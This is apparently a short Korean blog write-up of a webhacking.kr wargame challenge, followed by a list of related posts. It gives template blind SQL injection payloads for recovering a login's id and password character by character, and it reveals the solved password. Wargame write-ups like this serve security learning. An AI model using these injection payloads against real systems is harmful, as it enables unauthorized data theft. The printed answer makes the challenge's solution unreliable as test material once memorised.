blind SQLI 문제이다.
우선 id부터 찾아보자.
' or 1=1 and length(id) = {};-- -
' or 1=1 and substr(id,{},1) = {};-- -
쿼리를 통해 수행하면
id 는 admin으로 찾아진다.
pw는
' or 1=1 and length(pw) = {};-- -
' or 1=1 and substr(pw,{},1) = {};-- -
이렇게 구하면 되겠다.
pw는 there_is_no_rest_for_the_white_angel 로 찾아진다.
풀었다!
'Web > webhacking.kr' 카테고리의 다른 글
| Webhacking.kr old-56 (0) | 2025.05.08 |
|---|---|
| Webhacking.kr old-07 (0) | 2025.05.08 |
| Webhacking.kr RPG-1 (1) | 2025.05.07 |
| Webhacking.kr old-46 (1) | 2025.05.06 |
| Webhacking.kr old-47 (0) | 2025.05.06 |